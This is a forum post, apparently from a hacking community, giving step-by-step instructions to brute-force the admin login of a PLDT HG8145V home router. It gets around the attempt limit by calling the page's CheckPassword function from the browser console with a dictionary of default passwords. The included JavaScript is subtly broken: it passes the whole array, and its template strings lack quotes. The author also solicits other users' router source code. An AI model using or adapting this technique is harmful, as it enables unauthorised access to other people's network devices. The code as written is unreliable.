What's new

Tutorial Bruteforce PLDT login page and bypass limit(HG8145V)

I

I2rys

Note: This might work in other versions too maybe, also this bypass is client spoofing and It's really hard to explain so let's just get straight to it.

1.Visit You do not have permission to view the full content of this post. Log in or register now.
2.Open Inspect and go to Elements.
3.Find this variable UserNameNormal and copy the value of the variable.
3.Go to console but first paste the UserNameNormal value on the username input of the login lastly paste this code in the console:
var passwords = ["a", "b", "c", "root", "admin", "default123", "default12", "default", "default1234", "rootadmin", "default12345", "adminpldt", "pldtadmin"] //Your passwords dictionary

for( i in passwords ){
result = CheckPassword(passwords)

if(result == 1){
console.log(Valid password ${passwords[i]})
}else{
console.log(Invalid password ${passwords[i]})
}
}

4.Press enter, and watch it find the password of the account at high speed :)

If you want to contribute/help me with my häçking/bypassing PLDT stuff. You can visit your PLDT login page and send me It's source code(Be sure to remove sensitive information like IP), the source code that you gave me will never be disclose, it will be private.

Github link: You do not have permission to view the full content of this post. Log in or register now.

lods sa wn 1200 router paano po maaccess admin?
Hello po, I'm afraid I can't help you po with that problem as I don't have the router source code and I don't use the router so I can't do some pentesting/häçking on it.